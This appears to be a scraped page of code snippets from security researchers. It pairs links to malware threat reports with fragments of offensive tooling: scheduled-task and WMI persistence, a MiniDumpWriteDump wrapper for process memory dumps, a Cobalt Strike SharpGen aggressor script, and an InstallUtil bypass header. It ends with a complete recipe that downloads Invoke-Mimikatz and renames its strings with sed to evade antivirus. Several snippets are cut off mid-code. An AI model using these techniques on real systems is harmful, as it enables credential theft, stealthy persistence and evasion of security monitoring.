jaredhaight

Resources

Malware examples

• Fireeye HammerToss PDF: https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf
• 7 Years of Dukes: https://labsblog.f-secure.com/2015/09/17/the-dukes-7-years-of-russian-cyber-espionage/
• RTM Banking malware: https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf
• Lowball Malware: https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html
• CloudAtlas malware: https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/

Security Tools and Resources

itsreallynick

 143 function Invoke-Mimidogz
 140 function Invoke-Mimikatz
  29 function Invoke-Mimi
  10 function Chokorun
   7 function Invoke-Ttest
   7 function Invoke-Mimiwormz
   7 function Invoke-Me
   6 function Invoke-Mimiturtle
   6 function Invoke-Mimimi
   5 function output

mubix

Get-ScheduledTask -TaskName 'XblGameSaveTaskLogon' | % { $_.Actions += New-ScheduledTaskAction -Execute 'calc.exe'; Set-ScheduledTask -TaskPath $_.TaskPath -TaskName $_.TaskName -Action $_.Actions }

Graph-X

from Microsoft.Win32 import Registry
from time import sleep	
rkey = Registry.CurrentUser.CreateSubKey("SOFTWARE\\aatest")
rkey.SetValue(u'\x00 this is a test',u'\x00look at me!')
rkey.Close()
rkey = Registry.CurrentUser.CreateSubKey("SOFTWARE\\aatest")
values = rkey.GetValueNames()
print("We have {0} values.".format(str(len(values))))
print("The value names returned are: {0}.".format(values[0]))
value = rkey.GetValue(u'\x00 this is a test')

brettmillerb

DisplayName                          Twitterhandle   
-----------                          -------------   
fr016                                @fr0161         
chgopsug                             @chgopsug       
Kevin Bates                          @_bateskevin    
Danny Maertens                       @maertend33     
Julien Reisdorffer                   @JReisdorffer   
Ben Reader                           @powers_hell    

dtmsecurity

$dotnetpath = "/usr/local/share/dotnet/dotnet";
$sharpgenpath = "/Users/dtmsecurity/Tools/SharpGen/bin/Debug/netcoreapp2.1/SharpGen.dll";
$temppath = "/tmp/";

beacon_command_register("sharpgen", "Compile and execute C-Sharp","Synopsis: sharpgen [code]\n");

alias sharpgen{
	$executionId  = "sharpgen_" . int(rand() * 100000);
	$temporaryCsharp =  $temppath . $executionId . ".cs";
	$executableFilename = $temppath . $executionId . ".exe";

dmaasland

$Source = @"
using System;
using System.Runtime.InteropServices;

namespace ProcDump {
    public static class DbgHelp {
        [DllImport("Dbghelp.dll")]
        public static extern bool MiniDumpWriteDump(IntPtr hProcess, uint ProcessId, IntPtr hFile, IntPtr DumpType, IntPtr ExceptionParam, IntPtr UserStreamParam, IntPtr CallbackParam);
    }
}

mgeeky

'
' SYNOPSIS:
' 	WMI Persistence method as originally presented by SEADADDY malware
'		(https://github.com/pan-unit42/iocs/blob/master/seaduke/decompiled.py#L887)
' 	and further documented by Matt Graeber.
'
' 	The scheduled command will be launched after roughly 3 minutes since system 
' 	gets up. Also, even if the command shall spawn a window - it will not be visible,
' 	since the command will get invoked by WmiPrvSE.exe that's running in Session 0.
'

nicholasmckinney

using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;

/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause

PaulSec

# AV Bypass to run Mimikatz
# From: https://www.blackhillsinfosec.com/?p=5555

# Server side:
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1
sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.ps1
sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1
sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1
sed -i -e 's/ArgumentPtr/NotTodayPal/g' Invoke-Mimikatz.ps1